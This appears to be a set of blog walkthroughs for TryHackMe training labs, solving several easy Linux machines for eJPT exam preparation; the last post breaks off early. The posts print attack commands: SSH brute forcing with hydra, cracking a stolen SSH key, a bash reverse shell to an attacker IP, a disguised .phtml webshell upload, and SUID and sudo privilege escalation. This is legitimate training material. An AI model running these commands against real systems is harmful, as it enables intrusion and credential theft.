[{"content":"Summary Basic Pentesting is the first machine in my Road to eJPTv2 series. It\u0026rsquo;s an excellent starting point because it covers several areas that appear on the exam: service enumeration (SMB, HTTP), directory fuzzing, SSH bruteforce, and SSH private key cracking. If you\u0026rsquo;re starting with TryHackMe and the eJPT, this machine is mandatory.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Basic Pentesting Skills SMB Enum, Web Fuzzing, SSH Bruteforce, SSH Key Cracking Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration enum4linux — SMB enumeration gobuster — web directory fuzzing hydra — SSH bruteforce ssh2john + john — SSH key hash extraction and cracking Solution overview Nmap reveals SSH, HTTP, SMB ports and an additional service SMB enumeration with enum4linux reveals two users: jan and kay Web fuzzing with gobuster discovers a /development directory with hints SSH bruteforce with hydra against user jan obtains credentials Inside the system, we access kay\u0026rsquo;s id_rsa (root-equivalent user) The key is protected with a passphrase — cracked with john for final access Reconnaissance Connectivity check ping -c 1 10.X.X.X TTL=60 → target is Linux. 
This rules out typical Windows exploits like SMB EternalBlue and orients the strategy toward Unix service enumeration.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.X.X.X -n -Pn -sS -p- --min-rate=5000 -oG allTCPports Flag justification:\n-n skips DNS resolution, makes scan faster -Pn assumes host is up, skips ping (some firewalls block ICMP) -sS SYN scan — stealthy, doesn\u0026rsquo;t complete the TCP connection --min-rate=5000 forces minimum speed of 5000 packets/sec -oG greppable output, useful for piping ports to another scan Once open ports identified, targeted scan with version detection and default scripts:\nnmap 10.X.X.X -n -Pn -sS -sVC -p22,80,139,445,8009,8080 --min-rate=5000 -oN basicscan.txt Key findings:\n22/tcp — OpenSSH (potential bruteforce vector) 80/tcp — Apache (review content and fuzzing) 139/445 tcp — SMB Samba (enumeration with enum4linux) 8080/tcp — Apache Tomcat (potential admin login) SMB enumeration with enum4linux SMB is one of the most rewarding vectors on misconfigured Linux machines. Poorly protected users and shares often leak sensitive information.\nenum4linux -a 10.X.X.X Critical finding: two system users:\njan kay This changes the plan: now we have usernames, opening the door to targeted SSH bruteforce.\nWeb service enumeration Before jumping to bruteforce, we check the web for plaintext credentials or hints.\nwhatweb whatweb http://10.X.X.X Identifies the stack: Apache + standard tech. Nothing flashy at first glance.\nFuzzing with gobuster gobuster dir -u http://10.X.X.X \\ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -t 50 -x php,txt,html Finding: accessible /development directory.\nInside, we find dev.txt with a message signed by two people, J and K — matches the users found via SMB. The notes mention that J is using a weak password.\nReasoning: this is the classic \u0026ldquo;info the dev team leaves by mistake\u0026rdquo; pattern. 
The hint is clear: jan has a weak password → targeted SSH bruteforce.\nExploitation Attack vector With the previous findings, the plan is:\nSSH bruteforce against user jan with hydra and a common wordlist Once inside, pivot to kay (likely the user with more privileges, based on the document signature) SSH bruteforce with Hydra hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.X.X.X -t 4 Flag justification:\n-l jan single user (not -L which would be a user list) -P rockyou.txt the most common wordlist for weak passwords -t 4 4 parallel tasks (higher can cause SSH server lockouts) Credentials obtained: jan:armando\nInitial access via SSH ssh jan@10.X.X.X Now inside the system with jan\u0026rsquo;s limited permissions.\nPost-exploitation Identity and context id uname -a hostname uid=1001(jan) gid=1001(jan) groups=1001(jan) Linux basic-pentesting 4.4.0-... jan is a standard user without visible privileged groups. Time to enumerate the system looking for the path to kay or root.\nSystem enumeration Reviewing home directories and accessible files:\nls -la /home/ ls -la /home/kay/ ls -la /home/kay/.ssh/ Critical finding: kay\u0026rsquo;s .ssh folder has read permissions for other users, allowing us to read the id_rsa (SSH private key).\ncat /home/kay/.ssh/id_rsa I copy the full key to my attacking machine for processing.\nPrivilege escalation Identified vector kay\u0026rsquo;s private key is accessible, but it\u0026rsquo;s protected with a passphrase. If I can crack the passphrase, I\u0026rsquo;ll have direct SSH access as kay. 
This is lateral movement, but kay has elevated permissions that jan doesn\u0026rsquo;t (we\u0026rsquo;ll confirm this after).\nHash extraction with ssh2john john can\u0026rsquo;t directly attack encrypted SSH keys; first we need to extract the hash in a format it understands:\nssh2john id_rsa \u0026gt; kay_hash Cracking with John the Ripper john --wordlist=/usr/share/wordlists/rockyou.txt kay_hash Passphrase obtained: beeswax\nFinal access as kay chmod 600 id_rsa ssh -i id_rsa kay@10.X.X.X Entering the passphrase, we get a shell as kay.\nFlag capture cat /home/kay/pass.bak Final flag: [contents of pass.bak]\nLessons learned SMB is gold on Linux machines — enum4linux should be one of your first moves when ports 139/445 appear. The user list obtained changed the entire plan. .txt file hints are intentional — In CTFs, files like dev.txt, notes.md, todo.txt always contain key info. Don\u0026rsquo;t skip them. Misconfigured .ssh permissions — A private key readable by other users is a common vulnerability in poorly administered real-world environments. Always check /home/*/.ssh/. SSH key passphrases are crackable — ssh2john + john is the standard combo. A weak passphrase completely defeats the protection of key encryption. For the eJPT This machine exercises skills directly evaluated on the eJPT:\nNmap enumeration (key syntax and flags) SMB enumeration with enum4linux Directory fuzzing with gobuster Bruteforcing with hydra Hash manipulation and cracking with john Approximate solving time: 30-45 minutes for someone familiar with the tools.\nReferences Basic Pentesting — TryHackMe Hydra documentation John the Ripper — ssh2john enum4linux — Cheatsheet ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/basic-pentesting/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBasic Pentesting\u003c/strong\u003e is the first machine in my \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series. 
It\u0026rsquo;s an excellent starting point because it covers several areas that appear on the exam: service enumeration (SMB, HTTP), directory fuzzing, SSH bruteforce, and SSH private key cracking. If you\u0026rsquo;re starting with TryHackMe and the eJPT, this machine is mandatory.\u003c/p\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eAttribute\u003c/th\u003e\n          \u003cth\u003eValue\u003c/th\u003e\n      \u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eTryHackMe\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eEasy\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eLinux\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/basicpentestingjt\"\u003eBasic Pentesting\u003c/a\u003e\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eSMB Enum, Web Fuzzing, SSH Bruteforce, SSH Key Cracking\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"video-version\"\u003eVideo version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" 
src=\"https://www.youtube.com/embed/r4KI2r7OnGw?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"Basic Pentesting"},{"content":"Summary Pickle Rick is the second machine in the Road to eJPTv2 series and one of the most entertaining on TryHackMe. Unlike the first machine where the vector was SSH bruteforce, here the focus is entirely web-based: source code review, directory enumeration, and exploitation of a command panel with direct RCE. The objective is to find three secret ingredients Rick needs to revert his pickle transformation.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Pickle Rick Skills Web Enum, Source Code Review, RCE, Reverse Shell, Sudo Privesc 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration whatweb — web server fingerprinting gobuster — directory and file fuzzing netcat — reverse shell listener Solution overview Nmap reveals only two ports: SSH (22) and HTTP (80) Page source code exposes username R1ckRul3s robots.txt leaks the password Wubbalubbadubdub Gobuster discovers /login.php — we log in with found credentials Portal has a command panel with direct RCE — we get a reverse shell Second ingredient found in /home/rick/ sudo -l reveals full passwordless permissions → sudo su → root Third ingredient in /root/3rd.txt Reconnaissance Connectivity check ping -c 1 10.201.1.254 64 bytes from 10.201.1.254: icmp_seq=1 ttl=60 time=145 ms TTL=60 → target machine is Linux. 
Important to orient the strategy from the start.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.201.1.254 -n -Pn -sS -p- --min-rate=5000 -oG allTCPports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Only two ports. A reduced attack surface means the solution goes through one of these two services. Without SSH credentials yet, the natural next step is to enumerate the web service.\nTargeted scan with version detection and scripts:\nnmap 10.201.1.254 -n -Pn -sS -sVC -p22,80 --min-rate=5000 -oN picklescan.txt PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 80/tcp open http Apache httpd 2.4.41 (Ubuntu) |_http-title: Rick is sup4r cool Key findings:\nPort 22: OpenSSH — no credentials yet, leave for later Port 80: Apache with title \u0026ldquo;Rick is sup4r cool\u0026rdquo; — there\u0026rsquo;s web content to explore WhatWeb fingerprinting whatweb http://10.201.1.254 Apache[2.4.41], Bootstrap, HTML5, JQuery, Title[Rick is sup4r cool] Standard stack: Apache + Bootstrap. No unusual technologies at first glance. Manual content enumeration is the next step.\nSource code review One of the first things to do on any web application is review the source code. Developers sometimes leave comments with sensitive information.\nIn the browser: Ctrl + U or right-click → \u0026ldquo;View page source\u0026rdquo;.\n\u0026lt;!-- Note to self, remember username! Username: R1ckRul3s --\u0026gt; Critical finding: username R1ckRul3s found in an HTML comment. Never leave credentials in comments — this is a very common information exposure vulnerability in poorly configured real-world environments.\nrobots.txt robots.txt is a standard file that tells search engines which pages not to index. In pentesting, always check it because it sometimes contains hidden paths or, as in this case, unexpected information.\nhttp://10.201.1.254/robots.txt Wubbalubbadubdub Finding: this string looks like a password. 
Combined with the username found in the source code, we have potential credentials: R1ckRul3s:Wubbalubbadubdub.\nFuzzing with Gobuster With credentials in hand, we need a login panel. Gobuster will search for hidden files and directories:\ngobuster dir -u http://10.201.1.254 \\ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -t 50 -x php,txt,xml,html,bak /index.html (Status: 200) /login.php (Status: 200) /assets (Status: 301) /portal.php (Status: 302) [--\u0026gt; /login.php] /robots.txt (Status: 200) Key finding: /login.php with status 200 and /portal.php redirecting to login. The portal is what we\u0026rsquo;re looking for — we need to authenticate to access it.\nExploitation Web portal access Using the credentials found during reconnaissance:\nUsername: R1ckRul3s Password: Wubbalubbadubdub We access http://10.201.1.254/login.php and the credentials work. The portal redirects to /portal.php.\nRemote Code Execution (RCE) The portal has a \u0026ldquo;Commands\u0026rdquo; tab with a command input field and an \u0026ldquo;Execute\u0026rdquo; button. This is direct remote code execution — we can run operating system commands from the browser.\nWe verify real execution:\nwhoami www-data We have execution as www-data. From here we can browse the system or launch a reverse shell for more flexibility.\nFirst ingredient found directly from the panel:\ncat Sup3rS3cretPickl3Ingred.txt First ingredient: mr. meeseek hair\nReverse Shell For more flexibility and to run more complex commands, we launch a reverse shell. On our attacking machine:\nnc -nlvp 4545 From the portal command panel:\nbash -c \u0026#39;bash -i \u0026gt;\u0026amp; /dev/tcp/10.13.93.83/4545 0\u0026gt;\u0026amp;1\u0026#39; connect to [10.13.93.83] from (UNKNOWN) [10.201.1.254] 56166 www-data@ip-10-201-1-254:/var/www/html$ Shell obtained. 
We stabilize:\nexport TERM=xterm export SHELL=bash stty rows 41 cols 183 A stabilized shell allows autocomplete, history, and won\u0026rsquo;t break on Ctrl+C. Always stabilize before continuing enumeration.\nPost-exploitation Identity and context id uname -a uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux ip-10-201-1-254 5.15.0-1064-aws x86_64 GNU/Linux We are www-data — the web server user, no visible special privileges. We need to escalate.\nSecond ingredient Exploring home directories:\nls /home/ ls -l /home/rick/ cat /home/rick/second\\ ingredients Second ingredient: 1 jerry tear\nSSH key escalation attempt With access as www-data and knowledge of user rick, we try creating an SSH key to connect directly as rick:\n# On our attacking machine ssh-keygen -t rsa -b 2048 -f rick_key cp rick_key.pub authorized_keys chmod 600 authorized_keys python3 -m http.server 80 # On the victim machine wget http://10.13.93.83/authorized_keys -O /home/rick/.ssh/authorized_keys The key was transferred successfully, but SSH access didn\u0026rsquo;t work. Directory permissions on .ssh or SSH server configuration prevented it.\nImportant lesson: when one path fails, don\u0026rsquo;t get stuck. Enumerate other options. In this case, sudo -l revealed the real vector in seconds.\nPrivilege Escalation Sudo enumeration When SSH key escalation didn\u0026rsquo;t work, the next question is: what can www-data run with sudo?\nsudo -l User www-data may run the following commands on ip-10-201-1-254: (ALL) NOPASSWD: ALL Critical finding: www-data can run any command as any user without a password. This is an extremely dangerous misconfiguration. In a real environment, this means having root the moment you compromise the web server.\nEscalation to root sudo su whoami root Third ingredient cat /root/3rd.txt Third ingredient: 3rd ingredients: fleeb juice\nAll three ingredients # Ingredient Location 1 mr. 
meeseek hair /var/www/html/Sup3rS3cretPickl3Ingred.txt 2 1 jerry tear /home/rick/second ingredients 3 fleeb juice /root/3rd.txt Lessons learned Source code is always worth reviewing — An HTML comment exposed the username directly. In real applications, credentials and tokens in comments are critical findings in any web pentest. robots.txt isn\u0026rsquo;t just for SEO — In this machine it contained the password. In real environments it can reveal admin paths, internal APIs, or sensitive files the owner didn\u0026rsquo;t want indexed but left accessible. RCE from a web panel is the most direct vector possible — You don\u0026rsquo;t need sophisticated exploits if the application gives you direct command execution. Thorough web enumeration (gobuster + manual review) made it possible. When one path fails, enumerate another — The SSH key attempt with rick didn\u0026rsquo;t work. Instead of persisting, sudo -l revealed the real vector in seconds. Always have a privesc checklist and work through it. sudo -l should be one of your first post-shell commands — (ALL) NOPASSWD: ALL is one of the most dangerous configurations that exists on Linux. If it appears, you already have root. 
For the eJPT This machine exercises skills directly evaluated on the eJPT:\nManual web enumeration (source code, robots.txt) Directory fuzzing with gobuster RCE identification and exploitation Reverse shell setup and stabilization Privilege enumeration with sudo -l Linux privilege escalation via sudo misconfiguration Approximate solving time: 20-30 minutes once you master basic web enumeration.\nReferences Pickle Rick — TryHackMe Gobuster documentation PayloadsAllTheThings — Reverse Shell Cheatsheet GTFOBins — sudo ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/pickle-rick/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003ePickle Rick\u003c/strong\u003e is the second machine in the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and one of the most entertaining on TryHackMe. Unlike the first machine where the vector was SSH bruteforce, here the focus is entirely web-based: source code review, directory enumeration, and exploitation of a command panel with direct RCE. 
The objective is to find three secret ingredients Rick needs to revert his pickle transformation.\u003c/p\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eAttribute\u003c/th\u003e\n          \u003cth\u003eValue\u003c/th\u003e\n      \u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eTryHackMe\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eEasy\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eLinux\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/picklerick\"\u003ePickle Rick\u003c/a\u003e\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eWeb Enum, Source Code Review, RCE, Reverse Shell, Sudo Privesc\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"-video-version\"\u003e🎥 Video version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/14xHZ8bSEeY?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; 
border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"Pickle Rick"},{"content":"Summary RootMe is the third machine in the Road to eJPTv2 series and introduces two new techniques not seen before: file upload filter bypass and privilege escalation via Python SUID. Unlike previous machines where access came through exposed credentials or direct RCE, here we need to bypass an extension restriction to upload a reverse shell.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room RootMe Skills Web Enum, File Upload Bypass, Reverse Shell, SUID Abuse 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration gobuster — directory fuzzing php-reverse-shell — Pentest Monkey webshell (included in Kali) netcat — reverse shell listener find — search for SUID binaries Solution overview Nmap reveals two ports: SSH (22) and HTTP (80) with Apache 2.4.41 Gobuster discovers /panel/ directory (file upload panel) The panel blocks .php extensions — bypassed by renaming to .phtml Reverse shell uploaded successfully and executed from /uploads/ User flag found at /var/www/user.txt SUID binary search reveals /usr/bin/python with SUID bit set Python SUID abuse with os.execl to get root shell Reconnaissance Connectivity check ping -c 1 10.201.73.204 64 bytes from 10.201.73.204: icmp_seq=1 ttl=60 time=144 ms TTL=60 → target is Linux. Consistent with previous machines in the series.\nNmap port scan Initial sweep of all TCP ports:\nnmap 10.201.73.204 -n -Pn -sS -p- --min-rate=5000 -oG allTCPports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Only two open ports. 
The reduced attack surface means the main vector is the web application.\nTargeted scan with version detection and scripts:\nnmap 10.201.73.204 -n -Pn -sS -sVC -p22,80 --min-rate=5000 -oN rootmescan.txt PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 80/tcp open http Apache httpd 2.4.41 (Ubuntu) |_http-title: HackIT - Home | http-cookie-flags: | /: PHPSESSID: httponly flag not set Key findings:\nPort 80: Apache with title \u0026ldquo;HackIT\u0026rdquo; — there\u0026rsquo;s a web application to explore PHPSESSID without httponly flag — the site uses PHP and cookies are accessible via JavaScript (relevant for XSS attacks in real scenarios) Port 22: SSH active — no credentials yet Fuzzing with Gobuster gobuster dir -u http://10.201.73.204 \\ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \\ -t 50 -x php,txt,xml,html,bak /index.php (Status: 200) /uploads (Status: 301) /css (Status: 301) /js (Status: 301) /panel (Status: 301) Key finding: two interesting directories:\n/panel/ → file upload panel (exploitation vector) /uploads/ → directory where uploaded files are stored (needed to execute the shell) The combination of upload panel + accessible uploads directory is the classic file upload vulnerability pattern.\nExploitation File upload panel We access http://10.201.73.204/panel/ and find a file upload form.\nThe first attempt is uploading a PHP reverse shell directly — the panel rejects it with an error message indicating .php files are not allowed.\nFile Upload Bypass: .phtml extension Poorly implemented extension filters only block the most obvious extensions (.php). Apache can execute PHP code with other extensions like .phtml, .php5, .phar, among others.\nWe prepare the reverse shell:\n# Copy the reverse shell included in Kali cp /usr/share/webshells/php/php-reverse-shell.php . 
# Rename mv php-reverse-shell.php rev.php # Edit IP and port (our attacking IP and listener port) nvim rev.php # Change extension to bypass the filter mv rev.php rev.phtml Why does .phtml work? Apache executes as PHP any file whose extension is mapped in its configuration. .phtml is an alternative PHP extension that many basic filters don\u0026rsquo;t include in their blacklist. This is an incomplete file type validation vulnerability.\nWe upload rev.phtml to the panel → the server accepts it.\nReverse Shell We set up a listener on our attacking machine:\nnc -nlvp 4545 We navigate to the URL where the file was uploaded to execute it:\nhttp://10.201.73.204/uploads/rev.phtml connect to [10.13.93.83] from (UNKNOWN) [10.201.73.204] 53644 Linux ip-10-201-73-204 5.15.0-139-generic uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can\u0026#39;t access tty; job control turned off $ Shell obtained as www-data. We stabilize:\nexport SHELL=bash stty rows 41 cols 184 Note: on this machine $SHELL returns /usr/sbin/nologin (the www-data user has no assigned shell). That\u0026rsquo;s why we manually export SHELL=bash so commands work correctly.\nPost-exploitation System enumeration We review home directories to identify system users:\nls -l /home drwxr-xr-x 4 rootme rootme 4096 rootme drwxr-xr-x 3 test test 4096 test drwxr-xr-x 4 ubuntu ubuntu 4096 ubuntu Three users: rootme, test, ubuntu. Home directories are empty, no useful information immediately.\nUser flag We search for user.txt across the entire system:\nfind / -type f -name user.txt 2\u0026gt;/dev/null /var/www/user.txt cat /var/www/user.txt User flag: THM{y0u_g0t_a_sh3ll}\nInteresting: the flag is not in a user home directory but in /var/www/. This reinforces that the compromise vector was the web server.\nPrivilege Escalation SUID binary search Binaries with the SUID bit set run with the permissions of the file owner (not the executing user). 
If a SUID binary belongs to root and allows arbitrary code execution, we have direct escalation.\nfind / -perm -4000 2\u0026gt;/dev/null /usr/bin/python2.7 From the entire list, one binary should not have SUID:\n/usr/bin/python2.7 Why is this unusual? Scripting language interpreters (Python, Perl, Ruby) with SUID are extremely dangerous because they allow executing arbitrary code with the owner\u0026rsquo;s privileges. They should never have SUID on a production system. GTFOBins documents exactly how to abuse this.\nPython SUID abuse Using Python to launch a shell that inherits the SUID privileges (root):\npython -c \u0026#39;import os; os.execl(\u0026#34;/bin/sh\u0026#34;, \u0026#34;sh\u0026#34;, \u0026#34;-p\u0026#34;)\u0026#39; # whoami root What does this command do?\nimport os imports the operating system module os.execl(\u0026quot;/bin/sh\u0026quot;, \u0026quot;sh\u0026quot;, \u0026quot;-p\u0026quot;) replaces the current process with a /bin/sh shell The -p flag means \u0026ldquo;privileged mode\u0026rdquo; — the shell keeps the effective UID (root) instead of dropping to the real UID (www-data) Root flag cd /root cat root.txt Root flag: THM{pr1v1l3g3_3sc4l4t10n}\nLessons learned Single blacklist extension filters are insufficient — Blocking only .php is a false sense of security. A robust filter should use a whitelist (only allow specific extensions like .jpg, .png) instead of a blacklist. In a real pentest, this finding would be a critical vulnerability. An accessible /uploads/ directory is the second half of the problem — Uploading the file is just the first step. If the server doesn\u0026rsquo;t serve uploaded files as executables or stores them outside the webroot, the impact is reduced. Here both conditions failed. find / -perm -4000 must be on your privesc checklist — SUID binaries are one of the most common escalation vectors in CTFs and misconfigured real environments. Python, Perl, Vim, Bash with SUID are immediate red flags. 
GTFOBins is your best friend for SUID — When you find an unusual binary with SUID, GTFOBins (gtfobins.github.io) has the exploitation technique ready. Learn to use it as a reference, not just memorize commands. The -p flag in shell is critical to maintain privileges — Without -p, the shell drops the effective UID and you fall back to the real UID. A small detail with huge impact. For the eJPT This machine exercises skills directly evaluated on the eJPT:\nWeb enumeration with Nmap and Gobuster File upload vulnerability identification and exploitation Extension filter bypass Reverse shells from PHP webshells SUID binary enumeration Privilege escalation via SUID abuse Approximate solving time: 25-35 minutes once you know file upload bypass techniques.\nReferences RootMe — TryHackMe GTFOBins — Python SUID PayloadsAllTheThings — File Upload Pentest Monkey — PHP Reverse Shell ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/root-me/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eRootMe\u003c/strong\u003e is the third machine in the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and introduces two new techniques not seen before: \u003cstrong\u003efile upload filter bypass\u003c/strong\u003e and \u003cstrong\u003eprivilege escalation via Python SUID\u003c/strong\u003e. 
Unlike previous machines where access came through exposed credentials or direct RCE, here we need to bypass an extension restriction to upload a reverse shell.\u003c/p\u003e\n\u003ctable\u003e\n  \u003cthead\u003e\n      \u003ctr\u003e\n          \u003cth\u003eAttribute\u003c/th\u003e\n          \u003cth\u003eValue\u003c/th\u003e\n      \u003c/tr\u003e\n  \u003c/thead\u003e\n  \u003ctbody\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003ePlatform\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eTryHackMe\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eDifficulty\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eEasy\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eOS\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eLinux\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eRoom\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003e\u003ca href=\"https://tryhackme.com/room/rrootme\"\u003eRootMe\u003c/a\u003e\u003c/td\u003e\n      \u003c/tr\u003e\n      \u003ctr\u003e\n          \u003ctd\u003e\u003cstrong\u003eSkills\u003c/strong\u003e\u003c/td\u003e\n          \u003ctd\u003eWeb Enum, File Upload Bypass, Reverse Shell, SUID Abuse\u003c/td\u003e\n      \u003c/tr\u003e\n  \u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch3 id=\"-video-version\"\u003e🎥 Video version\u003c/h3\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/ckYf0BX5X5M?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 
0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cblockquote\u003e\n\u003cp\u003eIf you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\u003c/p\u003e","title":"RootMe"},{"content":"Summary Simple CTF is the fourth machine in the Road to eJPTv2 series and the most technically varied so far. It introduces three new vectors: anonymous FTP access, SQLi exploitation with a real CVE (CVE-2019-9053) against CMS Made Simple, and privilege escalation via sudo vim. Additionally, the obtained hash is salted, requiring a custom cracking script — a differentiating skill.\nAttribute Value Platform TryHackMe Difficulty Easy OS Linux Room Simple CTF Skills FTP Enum, Web Enum, SQLi, Hash Cracking, SSH, Sudo Privesc 🎥 Video version If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.\nTools used nmap — port and service enumeration ftp — anonymous server access gobuster — web directory fuzzing searchsploit — known exploit search Custom Python3 script — CVE-2019-9053 exploitation Custom Python3 script — salted MD5 hash cracking ssh — access with obtained credentials Solution overview Nmap reveals three services: FTP (21), HTTP (80) and SSH on non-standard port (2222) FTP allows anonymous login but passive mode times out Gobuster discovers /simple/ — CMS Made Simple version 2.2.8 Searchsploit identifies CVE-2019-9053 — time-based SQLi Python3 script extracts: salt, user mitch, email and MD5 hash Custom cracking script obtains the password: secret SSH access as mitch on port 2222 → user flag sudo -l reveals mitch can run vim as root Vim abuse with sudo vim -c ':!/bin/sh' → root Reconnaissance Connectivity check ping -c 1 10.201.40.102 64 bytes from 10.201.40.102: icmp_seq=1 ttl=60 time=140 ms TTL=60 → target is Linux.\nNmap port scan Initial sweep of all TCP ports:\nnmap 
